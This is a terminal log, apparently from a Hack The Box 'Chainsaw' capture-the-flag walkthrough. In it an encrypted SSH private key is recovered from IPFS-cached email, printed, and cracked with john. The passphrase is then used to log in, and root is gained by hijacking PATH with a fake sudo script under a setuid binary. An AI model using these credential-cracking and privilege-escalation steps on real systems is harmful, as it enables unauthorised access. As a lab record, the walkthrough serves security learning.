total 8
drwxr-x— 10 administrator administrator 4096 Nov 24 06:20 administrator
drwxr-x— 9 bobby bobby 4096 Nov 24 06:44 bobby
administrator@chainsaw:/home$ cd administrator
cd administrator
administrator@chainsaw:/home/administrator$ ls -lrt
ls -lrt
total 8
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv

administrator@chainsaw:/home/administrator$ ls -lrt
ls -lrt
total 8
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv
administrator@chainsaw:/home/administrator$ cd maintain
cd maintain
administrator@chainsaw:/home/administrator/maintain$ ls -lrt
ls -lrt
total 8
drwxrwxr-x 2 administrator administrator 4096 Dec 13 2018 pub
-rwxr-x— 1 administrator administrator 649 Dec 13 2018 gen.py
administrator@chainsaw:/home/administrator/maintain$ cd pub
cd pub
administrator@chainsaw:/home/administrator/maintain/pub$ ls -lrt
ls -lrt
total 20
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 arti.key.pub
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 bobby.key.pub
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 wendy.key.pub
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 lara.key.pub
-rw-rw-r– 1 administrator administrator 380 Dec 13 2018 bryan.key.pub

administrator@chainsaw:/home/administrator/maintain$ cat gen.py
cat gen.py
#!/usr/bin/python
from Crypto.PublicKey import RSA
from os import chmod
import getpass

def generate(username,password):
key = RSA.generate(2048)
pubkey = key.publickey()

pub = pubkey.exportKey(‘OpenSSH’)
priv = key.exportKey(‘PEM’,password,pkcs=1)

filename = “{}.key”.format(username)

with open(filename, ‘w’) as file:
chmod(filename, 0600)
file.write(priv)
file.close()

with open(“{}.pub”.format(filename), ‘w’) as file:
file.write(pub)
file.close()

# TODO: Distribute keys via ProtonMail

if __name__ == “__main__”:
while True:
username = raw_input(“User: “)
password = getpass.getpass()
generate(username,password)

administrator@chainsaw:/home/administrator/maintain$ cd ..
cd ..
administrator@chainsaw:/home/administrator$ ls -lrt
ls -lrt
total 8
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv
administrator@chainsaw:/home/administrator$ ls -la
ls -la
total 112
drwxr-x— 10 administrator administrator 4096 Nov 24 06:20 .
drwxr-xr-x 4 root root 4096 Dec 12 2018 ..
lrwxrwxrwx 1 administrator administrator 9 Dec 12 2018 .bash_history -> /dev/null
-rw-r—– 1 administrator administrator 220 Dec 12 2018 .bash_logout
-rw-r—– 1 administrator administrator 3771 Dec 12 2018 .bashrc
drwx—— 2 administrator administrator 4096 Nov 24 06:20 .cache
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv
drwx—— 3 administrator administrator 4096 Nov 24 06:20 .gnupg
drwxrwxr-x 5 administrator administrator 4096 Nov 24 06:26 .ipfs
drwxr-x— 3 administrator administrator 4096 Dec 12 2018 .local
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
drwxr-x— 2 administrator administrator 4096 Dec 12 2018 .ngrok2
-rw-r—– 1 administrator administrator 807 Dec 12 2018 .profile
drwxr-x— 2 administrator administrator 4096 Nov 24 06:19 .ssh
drwxr-x— 2 administrator administrator 4096 Dec 12 2018 .swt
-rw-r—– 1 administrator administrator 1739 Dec 12 2018 .tmux.conf
-rw-r—– 1 administrator administrator 45152 Dec 12 2018 .zcompdump
lrwxrwxrwx 1 administrator administrator 9 Dec 12 2018 .zsh_history -> /dev/null
-rw-r—– 1 administrator administrator 1295 Dec 12 2018 .zshrc

administrator@chainsaw:/home/administrator$ cd .ipfs
cd .ipfs
administrator@chainsaw:/home/administrator/.ipfs$ ls -la
ls -la
total 36
drwxrwxr-x 5 administrator administrator 4096 Nov 24 06:26 .
drwxr-x— 10 administrator administrator 4096 Nov 24 06:20 ..
drwxr-xr-x 41 administrator administrator 4096 Nov 24 06:26 blocks
-rw-rw—- 1 administrator administrator 5273 Dec 13 2018 config
drwxr-xr-x 2 administrator administrator 4096 Nov 24 06:26 datastore
-rw——- 1 administrator administrator 190 Dec 13 2018 datastore_spec
drwx—— 2 administrator administrator 4096 Dec 13 2018 keystore
-rw-r–r– 1 administrator administrator 2 Dec 13 2018 version

administrator@chainsaw:/home/administrator/.ipfs$ grep -Hinra bobby *
grep -Hinra bobby *
bobby.key.pub�6BBWXJ4N54A5BUNC7WYVUQNXLEQN67SNFTAPGUMYTYB2UAC4SGI.data:4:I�
blocks/JL/CIQKWHQP7PFXWUXO6CSIFQMFWW4CTR23WJEFINRLPRC6UAP2ZM5EJLY.data:4:�_���f�ԙ���|���>��7b9bobbyaxelrod600-protonmail-2018-12-13-T20_28_54+01_00.eml�$b
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:9:To: bobbyaxelrod600@protonmail.ch <bobbyaxelrod600@protonmail.ch>
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:10:X-Attached: bobby.key.enc
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:13:X-Original-To: bobbyaxelrod600@protonmail.ch
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:15:Delivered-To: bobbyaxelrod600@protonmail.ch
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:37:Content-Type: application/octet-stream; filename=”bobby.key.enc”; name=”bobby.key.enc”
blocks/OY/CIQG3CRQFZCTNW7GKEFLYX5KSQD4SZUO2SMZHX6ZPT57JIR6WSNTOYQ.data:39:Content-Disposition: attachment; filename=”bobby.key.enc”; name=”bobby.key.enc”
blocks/SP/CIQJWFQFWYW5QEXAELBZ5WBEDCJBZ2RSPCHVGDOXQ6FM67VBWKVTSPI.data:5:bobby@chainsaw,Yes,Java Developer</bobbyaxelrod600@protonmail.ch>

administrator@chainsaw:/home/administrator$ ipfs refs local
ipfs refs local
QmYCvbfNbCwFR45HiNP45rwJgvatpiW38D961L5qAhUM5Y
QmPctBY8tq2TpPufHuQUbe2sCxoy2wD5YRB6kdce35ZwAx
QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB
QmdL9t1YP99v4a2wyXFYAQJtbD9zKnPrugFLQWXBXb82sn
QmSKboVigcD3AY4kLsob117KJcMHvMUu6vNFqk1PQzYUpp
QmUHHbX4N8tUNyXFK9jNfgpFFddGgpn72CF1JyNnZNeVVn
QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1
QmWSLAHhiNVRMFMv4bnE7fqq9E74RtXTRm9E1QVo37GV9t
QmPjsarLFBcY8seiv3rpUZ2aTyauPF3Xu3kQm56iD6mdcq
QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri
QmdfTbBqBPQ7VNxZEYEj14VmRuZBkqFbiwReogJgS1zR1n
QmfRZWFfaugHeY5gcgNDrnRkxhPT3epmHodryPYK3it6kk
QmZTR5bcpQD7cFgTorqxZDYaew1Wqgfbd2ud9QqGPAkK2V
QmejvEPop4D7YUadeGqYWmZxHhLc4JBUCzJJHWMzdcMe2y
QmbkQxbErC7KSWzSQw2FC13LUm9Rbo2XjeFQZbcmdarpuz
QmPpsT37SpTbZkAeMz7LXiJ8nQseBNziGBzpW1YtM67qx6
QmXWS8VFBxJPsxhF8KEqN1VpZf52DPhLswcXpxEDzF5DWC
QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp
Qmb7oGTxge7amSArtJsGUAqswY8y1G7m5QNjV57Nj5sEHU
QmS4ustL54uo8FzR9455qaxZwuMiUhyvMcX9Ba8nUH4uVv
QmXymZCHdTHz5BA5ugv9MQTBtQAb6Vit4iFeEnuRj6Udrh
QmUNLLsPACCz1vLxQVkXqqLX5R1X345qqfHbsf67hvA3Nn
Qma6kDKzUzFioo62v4LZaNsrwmCojF9AqwLaQJubRFnsAa
QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me
QmXgqKTbzdh83pQtKFb19SpMCpDDcKR2ujqk3pKph9aCNF
QmYn3NxLLYA6xU2XL1QJfCZec4B7MpFNxVVtDvqbiZCFG8
QmWMuEvh2tGJ1DiNPPoN6rXme2jMYUixjxsC6QUji8mop8
QmY5heUM5qgRubMDD1og9fhCPA6QdkMp3QCwd4s7gJsyE7
QmQ5vhrL7uv6tuoN9KeVBwd4PwfQkXdVVmDLUZuTNxqgvm
QmZMUdskS6vK8ycBiAffrYAE4wUDuWX9eK7kNgQqPCGbwF
QmPC3ZbrMeZ8BpstpNseNV4fCRL4QDzUKrSv8EHkarbn7r
QmPhk6cJkRcFfZCdYam4c9MKYjFG9V29LswUnbrFNhtk2S
QmSyJKw6U6NaXupYqMLbEbpCdsaYR5qiNGRHjLKcmZV17r
QmZZRTyhDpL5Jgift1cHbAhexeE1m2Hw8x8g7rTcPahDvo
QmUH2FceqvTSAvn6oqm8M49TNDqowktkEx4LgpBx746HRS
QmcMCDdN1qDaa2vaN654nA4Jzr6Zv9yGSBjKPk26iFJJ4M
QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB
Qmc7rLAhEh17UpguAsEyS4yfmAbeqSeSEz4mZZRNcW52vV

administrator@chainsaw:/home/administrator$ ipfs ls QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri
/dev/null
-rw-r—– 1 administrator administrator 220 Dec 12 2018 .bash_logout
-rw-r—– 1 administrator administrator 3771 Dec 12 2018 .bashrc
drwx—— 2 administrator administrator 4096 Nov 24 06:20 .cache
-rw-r—– 1 administrator administrator 220 Dec 20 2018 chainsaw-emp.csv
drwx—— 3 administrator administrator 4096 Nov 24 06:20 .gnupg
drwxrwxr-x 5 administrator administrator 4096 Nov 24 12:10 .ipfs
drwxr-x— 3 administrator administrator 4096 Dec 12 2018 .local
drwxr-x— 3 administrator administrator 4096 Dec 13 2018 maintain
drwxr-x— 2 administrator administrator 4096 Dec 12 2018 .ngrok2
-rw-r—– 1 administrator administrator 807 Dec 12 2018 .profile
-rw-r–r– 1 administrator administrator 4629 Nov 24 12:10 QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
drwxr-x— 2 administrator administrator 4096 Nov 24 06:19 .ssh
drwxr-x— 2 administrator administrator 4096 Dec 12 2018 .swt
-rw-r—– 1 administrator administrator 1739 Dec 12 2018 .tmux.conf
-rw-r—– 1 administrator administrator 45152 Dec 12 2018 .zcompdump
lrwxrwxrwx 1 administrator administrator 9 Dec 12 2018 .zsh_history -> /dev/null
-rw-r—– 1 administrator administrator 1295 Dec 12 2018 .zshrc

administrator@chainsaw:/home/administrator$ cat QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
< cat QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF X-Pm-Origin: internal X-Pm-Content-Encryption: end-to-end Subject: Ubuntu Server Private RSA Key From: IT Department <chainsaw_admin@protonmail.ch>
Date: Thu, 13 Dec 2018 19:28:54 +0000
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary=———————d296272d7cb599bff2a1ddf6d6374d93
To: bobbyaxelrod600@protonmail.ch <bobbyaxelrod600@protonmail.ch>
X-Attached: bobby.key.enc
Message-Id: <zctvlwvo5mwy8nabt3clkmxvckb-cx7ocfxuyfhsu2af1nh4krcpggz7h-porsytjrt3sa9ju8wnuwaranbe0cy0nik2wmuwovonmrhhpou=@protonmail.ch>
Received: from mail.protonmail.ch by mail.protonmail.ch; Thu, 13 Dec 2018 14:28:58 -0500
X-Original-To: bobbyaxelrod600@protonmail.ch
Return-Path: <chainsaw_admin@protonmail.ch>
Delivered-To: bobbyaxelrod600@protonmail.ch</chainsaw_admin@protonmail.ch></zctvlwvo5mwy8nabt3clkmxvckb-cx7ocfxuyfhsu2af1nh4krcpggz7h-porsytjrt3sa9ju8wnuwaranbe0cy0nik2wmuwovonmrhhpou=@protonmail.ch></bobbyaxelrod600@protonmail.ch></chainsaw_admin@protonmail.ch>

———————–d296272d7cb599bff2a1ddf6d6374d93
Content-Type: multipart/related;boundary=———————ffced83f318ffbd54e80374f045d2451

———————–ffced83f318ffbd54e80374f045d2451
Content-Type: text/html;charset=utf-8
Content-Transfer-Encoding: base64

PGRpdj5Cb2JieSw8YnI+PC9kaXY+PGRpdj48YnI+PC9kaXY+PGRpdj5JIGFtIHdyaXRpbmcgdGhp
cyBlbWFpbCBpbiByZWZlcmVuY2UgdG8gdGhlIG1ldGhvZCBvbiBob3cgd2UgYWNjZXNzIG91ciBM
aW51eCBzZXJ2ZXIgZnJvbSBub3cgb24uIER1ZSB0byBzZWN1cml0eSByZWFzb25zLCB3ZSBoYXZl
IGRpc2FibGVkIFNTSCBwYXNzd29yZCBhdXRoZW50aWNhdGlvbiBhbmQgaW5zdGVhZCB3ZSB3aWxs
IHVzZSBwcml2YXRlL3B1YmxpYyBrZXkgcGFpcnMgdG8gc2VjdXJlbHkgYW5kIGNvbnZlbmllbnRs
eSBhY2Nlc3MgdGhlIG1hY2hpbmUuPGJyPjwvZGl2PjxkaXY+PGJyPjwvZGl2PjxkaXY+QXR0YWNo
ZWQgeW91IHdpbGwgZmluZCB5b3VyIHBlcnNvbmFsIGVuY3J5cHRlZCBwcml2YXRlIGtleS4gUGxl
YXNlIGFzayZuYnNwO3JlY2VwdGlvbiBkZXNrIGZvciB5b3VyIHBhc3N3b3JkLCB0aGVyZWZvcmUg
YmUgc3VyZSB0byBicmluZyB5b3VyIHZhbGlkIElEIGFzIGFsd2F5cy48YnI+PC9kaXY+PGRpdj48
YnI+PC9kaXY+PGRpdj5TaW5jZXJlbHksPGJyPjwvZGl2PjxkaXY+SVQgQWRtaW5pc3RyYXRpb24g
RGVwYXJ0bWVudDxicj48L2Rpdj4=
———————–ffced83f318ffbd54e80374f045d2451–
———————–d296272d7cb599bff2a1ddf6d6374d93
Content-Type: application/octet-stream; filename=”bobby.key.enc”; name=”bobby.key.enc”
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=”bobby.key.enc”; name=”bobby.key.enc”

LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBERVMtRURFMy1DQkMsNTNEODgxRjI5OUJBODUwMwoKU2VDTll3L0JzWFB5UXExSFJM
RUVLaGlOSVZmdFphZ3pPY2M2NGZmMUlwSm85SWVHN1ovemordjFkQ0lkZWp1awo3a3RRRmN6VGx0
dG5ySWo2bWRCYjZybk42Q3NQMHZiejlOelJCeWcxbzZjU0dkckwyRW1KTi9lU3hENEFXTGN6Cm4z
MkZQWTBWamxJVnJoNHJqaFJlMndQTm9nQWNpQ0htWkdFQjB0Z3YyL2V5eEU2M1ZjUnpyeEpDWWwr
aHZTWjYKZnZzU1g4QTRRcjdyYmY5Zm56NFBJbUlndXJGM1ZoUW1kbEVtekRSVDRtL3BxZjNUbUdB
azkrd3JpcW5rT0RGUQpJKzJJMWNQYjhKUmhMU3ozcHlCM1gvdUdPVG5ZcDRhRXErQVFaMnZFSnoz
RmZYOVNYOWs3ZGQ2S2FadFNBenFpCnc5ODFFUzg1RGs5TlVvOHVMeG5aQXczc0Y3UHo0RXVKMEhw
bzFlWmdZdEt6dkRLcnJ3OHVvNFJDYWR4N0tIUlQKaW5LWGR1SHpuR0ExUVJPelpXN3hFM0hFTDN2
eFI5Z01WOGdKUkhEWkRNSTl4bHc5OVFWd2N4UGNGYTMxQXpWMgp5cDNxN3lsOTU0U0NNT3RpNFJD
M1o0eVVUakRrSGRIUW9FY0dpZUZPV1UraTFvaWo0Y3J4MUxiTzJMdDhuSEs2CkcxQ2NxN2lPb240
UnNUUmxWcnY4bGlJR3J4bmhPWTI5NWU5ZHJsN0JYUHBKcmJ3c284eHhIbFQzMzMzWVU5ZGoKaFFM
TnA1KzJINCtpNm1tVTN0Mm9nVG9QNHNrVmNvcURsQ0MrajZoRE9sNGJwRDl0NlRJSnVyV3htcEdn
TnhlcwpxOE5zQWVudGJzRCt4bDRXNnE1bXVMSlFtai94UXJySGFjRVpER0k4a1d2WkUxaUZtVmtE
L3hCUm53b0daNWh0CkR5aWxMUHBsOVIrRGg3YnkzbFBtOGtmOHRRbkhzcXBSSGNleUJGRnBucTBB
VWRFS2ttMUxSTUxBUFlJTGJsS0cKandyQ3FSdkJLUk1JbDZ0SmlEODdOTTZKQm9ReWRPRWNwbis2
RFUrMkFjdGVqYnVyMGFNNzRJeWVlbnJHS1NTWgpJWk1zZDJrVFNHVXh5OW8veFBLRGtVdy9TRlV5
U21td2lxaUZMNlBhRGd4V1F3SHh0eHZtSE1oTDZjaXROZEl3ClRjT1RTSmN6bVIycEp4a29oTHJI
N1lyUzJhbEtzTTBGcEZ3bWR6MS9YRFNGMkQ3aWJmL1cxbUF4TDVVbUVxTzAKaFVJdVcxZFJGd0hq
TnZhb1NrK2ZyQXA2aWM2SVBZU21kbzhHWVl5OHBYdmNxd2ZScHhZbEFDWnU0RmlpNmhZaQo0V3Bo
VDNaRllEcnc3U3RnSzA0a2JEN1FrUGVOcTlFdjFJbjJuVmR6RkhQSWg2eitmbXBiZ2ZXZ2VsTEhj
MmV0ClNKWTQrNUNFYmtBY1lFVW5QV1k5U1BPSjdxZVU3K2IvZXF6aEtia3BuYmxtaUsxZjNyZU9N
MllVS3k4YWFsZWgKbkpZbWttcjN0M3FHUnpoQUVUY2tjOEhMRTExZEdFK2w0YmE2V0JOdTE1R29F
V0Fzenp0TXVJVjFlbW50OTdvTQpJbW5mb250T1lkd0I2LzJvQ3V5SlRpZjhWdy9XdFdxWk5icGV5
OTcwNGE5bWFwLytiRHFlUVE0MStCOEFDRGJLCldvdnNneVdpL1VwaU1UNm02clgrRlA1RDVFOHpy
WXRubm1xSW83dnhIcXRCV1V4amFoQ2RuQnJrWUZ6bDZLV1IKZ0Z6eDNlVGF0bFpXeXI0a3N2Rm10
b2JZa1pWQVFQQUJXeitnSHB1S2xycWhDOUFOenIvSm4rNVpmRzAybW9GLwplZEwxYnA5SFBSSTQ3
RHl2THd6VDEvNUw5Wno2WSsxTXplbmRUaTNLcnpRL1ljZnI1WUFSdll5TUxiTGpNRXRQClV2SmlZ
NDB1Mm5tVmI2UXFwaXkyenIvYU1saHB1cFpQay94dDhvS2hLQytsOW1nT1RzQVhZakNiVG1MWHpW
clgKMTVVMjEwQmR4RUZVRGNpeE5pd1Rwb0JTNk1meENPWndOLzFadjBtRThFQ0krNDRMY3FWdDN3
PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0=
———————–d296272d7cb599bff2a1ddf6d6374d93–

root@kali:~/Desktop/HTB/boxes/chainsaw# nano bobby.key.enc.b64
root@kali:~/Desktop/HTB/boxes/chainsaw# base64 -d bobby.key.enc.b64 > bobby.key.enc

root@kali:~/Desktop/HTB/boxes/chainsaw# cat bobby.key.enc
—–BEGIN RSA PRIVATE KEY—–
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,53D881F299BA8503

SeCNYw/BsXPyQq1HRLEEKhiNIVftZagzOcc64ff1IpJo9IeG7Z/zj+v1dCIdejuk
7ktQFczTlttnrIj6mdBb6rnN6CsP0vbz9NzRByg1o6cSGdrL2EmJN/eSxD4AWLcz
n32FPY0VjlIVrh4rjhRe2wPNogAciCHmZGEB0tgv2/eyxE63VcRzrxJCYl+hvSZ6
fvsSX8A4Qr7rbf9fnz4PImIgurF3VhQmdlEmzDRT4m/pqf3TmGAk9+wriqnkODFQ
I+2I1cPb8JRhLSz3pyB3X/uGOTnYp4aEq+AQZ2vEJz3FfX9SX9k7dd6KaZtSAzqi
w981ES85Dk9NUo8uLxnZAw3sF7Pz4EuJ0Hpo1eZgYtKzvDKrrw8uo4RCadx7KHRT
inKXduHznGA1QROzZW7xE3HEL3vxR9gMV8gJRHDZDMI9xlw99QVwcxPcFa31AzV2
yp3q7yl954SCMOti4RC3Z4yUTjDkHdHQoEcGieFOWU+i1oij4crx1LbO2Lt8nHK6
G1Ccq7iOon4RsTRlVrv8liIGrxnhOY295e9drl7BXPpJrbwso8xxHlT3333YU9dj
hQLNp5+2H4+i6mmU3t2ogToP4skVcoqDlCC+j6hDOl4bpD9t6TIJurWxmpGgNxes
q8NsAentbsD+xl4W6q5muLJQmj/xQrrHacEZDGI8kWvZE1iFmVkD/xBRnwoGZ5ht
DyilLPpl9R+Dh7by3lPm8kf8tQnHsqpRHceyBFFpnq0AUdEKkm1LRMLAPYILblKG
jwrCqRvBKRMIl6tJiD87NM6JBoQydOEcpn+6DU+2Actejbur0aM74IyeenrGKSSZ
IZMsd2kTSGUxy9o/xPKDkUw/SFUySmmwiqiFL6PaDgxWQwHxtxvmHMhL6citNdIw
TcOTSJczmR2pJxkohLrH7YrS2alKsM0FpFwmdz1/XDSF2D7ibf/W1mAxL5UmEqO0
hUIuW1dRFwHjNvaoSk+frAp6ic6IPYSmdo8GYYy8pXvcqwfRpxYlACZu4Fii6hYi
4WphT3ZFYDrw7StgK04kbD7QkPeNq9Ev1In2nVdzFHPIh6z+fmpbgfWgelLHc2et
SJY4+5CEbkAcYEUnPWY9SPOJ7qeU7+b/eqzhKbkpnblmiK1f3reOM2YUKy8aaleh
nJYmkmr3t3qGRzhAETckc8HLE11dGE+l4ba6WBNu15GoEWAszztMuIV1emnt97oM
ImnfontOYdwB6/2oCuyJTif8Vw/WtWqZNbpey9704a9map/+bDqeQQ41+B8ACDbK
WovsgyWi/UpiMT6m6rX+FP5D5E8zrYtnnmqIo7vxHqtBWUxjahCdnBrkYFzl6KWR
gFzx3eTatlZWyr4ksvFmtobYkZVAQPABWz+gHpuKlrqhC9ANzr/Jn+5ZfG02moF/
edL1bp9HPRI47DyvLwzT1/5L9Zz6Y+1MzendTi3KrzQ/Ycfr5YARvYyMLbLjMEtP
UvJiY40u2nmVb6Qqpiy2zr/aMlhpupZPk/xt8oKhKC+l9mgOTsAXYjCbTmLXzVrX
15U210BdxEFUDcixNiwTpoBS6MfxCOZwN/1Zv0mE8ECI+44LcqVt3w==
—–END RSA PRIVATE KEY—–

root@kali:~/Downloads# /usr/share/john/ssh2john.py bobby.key.enc > bobby.key.enc.hash
root@kali:~/Downloads# john –wordlist=/usr/share/wordlists/rockyou.txt ./bobby.key.enc.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
jackychain (bobby.key.enc)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2019-11-24 12:26) 0.1908g/s 2736Kp/s 2736Kc/s 2736KC/sa6_123..*7¡Vamos!
Session completed

root@kali:~/Downloads# chmod 600 bobby.key.enc
root@kali:~/Downloads# ssh -i bobby.key.enc bobby@10.10.10.142
Enter passphrase for key ‘bobby.key.enc’: jackychain

bobby@chainsaw:~$

bobby@chainsaw:~$ cat user.txt
af8d9df991cc59bXXXXXXXXXXXXXXXXXX

bobby@chainsaw:~$ cd projects

bobby@chainsaw:~/projects$ ls -lrt
total 4
drwxrwxr-x 2 bobby bobby 4096 Nov 24 06:45 ChainsawClub

bobby@chainsaw:~/projects$ cd ChainsawClub

bobby@chainsaw:~/projects/ChainsawClub$

bobby@chainsaw:~/projects/ChainsawClub$ cd /etc/supervisor/conf.d
bobby@chainsaw:/etc/supervisor/conf.d$ ls -lrt
total 8
-rw-r–r– 1 root root 130 Dec 12 2018 weaponizedping.conf
-rw-r–r– 1 root root 117 Dec 20 2018 chainsawclub.conf
bobby@chainsaw:/etc/supervisor/conf.d$ cat chainsawclub.conf
[program:ChainsawClub]
command=node /usr/local/bin/ganache-cli -h 127.0.0.1 -p 63991
autostart=true
autorestart=true

bobby@chainsaw:/$ pwd
/
bobby@chainsaw:/$ cd ~/projects
bobby@chainsaw:~/projects$ ls -lrt
total 4
drwxrwxr-x 2 bobby bobby 4096 Nov 24 06:45 ChainsawClub
bobby@chainsaw:~/projects$ cd ChainsawClub
bobby@chainsaw:~/projects/ChainsawClub$ ls -lrt
total 156
-rwsr-xr-x 1 root root 16544 Jan 12 2019 ChainsawClub
-rw-r–r– 1 root root 1164 Jan 23 2019 ChainsawClub.sol
-rw-r–r– 1 root root 126388 Jan 23 2019 ChainsawClub.json
-rwxrwxr-x 1 bobby bobby 18 Nov 24 06:44 sudo
-rw-r–r– 1 root root 44 Nov 24 06:45 address.txt

bobby@chainsaw:~/projects/ChainsawClub$ cat ChainsawClub.sol
pragma solidity ^0.4.22;

contract ChainsawClub {

string username = ‘nobody’;
string password = ‘7b455ca1ffcb9f3828cfdde4a396139e’;
bool approve = false;
uint totalSupply = 1000;
uint userBalance = 0;

function getUsername() public view returns (string) {
return username;
}
function setUsername(string _value) public {
username = _value;
}
function getPassword() public view returns (string) {
return password;
}
function setPassword(string _value) public {
password = _value;
}
function getApprove() public view returns (bool) {
return approve;
}
function setApprove(bool _value) public {
approve = _value;
}
function getSupply() public view returns (uint) {
return totalSupply;
}
function getBalance() public view returns (uint) {
return userBalance;
}
function transfer(uint _value) public {
if (_value > 0 && _value <= totalSupply) { totalSupply -= _value; userBalance += _value; } } function reset() public { username = ”; password = ”; userBalance = 0; totalSupply = 1000; approve = false; } } bobby@chainsaw:~/projects/ChainsawClub$ file ChainsawClub ChainsawClub: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=08b87cf44d6a671b91bc55f6e1f53c7ee083a417, not stripped bobby@chainsaw:~/projects/ChainsawClub$ ./ChainsawClub _ _ | | (_) ___| |__ __ _ _ _ __ ___ __ ___ __ / __| ‘_ \ / _` | | ‘_ \/ __|/ _` \ \ /\ / / | (__| | | | (_| | | | | \__ \ (_| |\ V V / \___|_| |_|\__,_|_|_| |_|___/\__,_| \_/\_/ club – Total supply: 1000 – 1 CHC = 51.08 EUR – Market cap: 51080 (€) [*] Please sign up first and then log in! [*] Entry based on merit. Username: Password: [*] Wrong credentials! ^C bobby@chainsaw:~/projects/ChainsawClub$ netstat -ntlp (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:9810 0.0.0.0:* LISTEN – tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN – tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN – tcp 0 0 127.0.0.1:63991 0.0.0.0:* LISTEN – tcp6 0 0 :::21 :::* LISTEN – tcp6 0 0 :::22 :::* LISTEN – root@kali:~/Downloads# ssh -L 63991:127.0.0.1:63991 -i bobby.key.enc bobby@10.10.10.142 Enter passphrase for key ‘bobby.key.enc’: jackychain bobby@chainsaw:~$ bobby@chainsaw:~/projects/ChainsawClub$ ltrace ./ChainsawClub setuid(0) = -1 system(“sudo -i -u root /root/ChainsawCl”…[sudo] password for bobby: bobby@chainsaw:~/projects/ChainsawClub$ export PATH=/tmp:$PATH bobby@chainsaw:~/projects/ChainsawClub$ echo -e ‘#!/bin/bash\n\n/bin/bash’ > /tmp/sudo
bobby@chainsaw:~/projects/ChainsawClub$ chmod +x /tmp/sudo
bobby@chainsaw:~/projects/ChainsawClub$ ./ChainsawClub
root@chainsaw:~/projects/ChainsawClub# id
uid=0(root) gid=1000(bobby) groups=1000(bobby),30(dip)
root@chainsaw:~/projects/ChainsawClub# cd /root
root@chainsaw:/root# cat root.txt
Mine deeper to get rewarded with root coin (RTC)…

root@chainsaw:/root# cd /home
root@chainsaw:/home# ls -lrt
total 8
drwxr-x— 9 bobby bobby 4096 Jan 23 2019 bobby
drwxr-x— 10 administrator administrator 4096 Nov 30 20:50 administrator
root@chainsaw:/home# cd bobby
root@chainsaw:~# ls -lrt
total 12
drwxrwxr-x 2 bobby bobby 4096 Dec 12 2018 resources
drwxrwxr-x 3 bobby bobby 4096 Dec 20 2018 projects
-r–r—– 1 bobby bobby 33 Jan 23 2019 user.txt
root@chainsaw:~# cd projects
root@chainsaw:~/projects# ls -lrt
total 4
drwxrwxr-x 2 bobby bobby 4096 Nov 30 21:42 ChainsawClub
root@chainsaw:~/projects# cd ChainsawClub/
root@chainsaw:~/projects/ChainsawClub# ls /sbin/ | head -1
acpi_available
root@chainsaw:~/projects/ChainsawClub#

root@chainsaw:~/projects/ChainsawClub# dpkg –search acpi_available
powermgmt-base: /sbin/acpi_available
powermgmt-base: /usr/share/man/man1/acpi_available.1.gz

root@chainsaw:~/projects/ChainsawClub# dpkg –search ChainsawClub
dpkg-query: no path found matching pattern *ChainsawClub*

root@chainsaw:~/projects/ChainsawClub# for file in $(ls /sbin/*); do dpkg –search $file 1>/dev/null; done
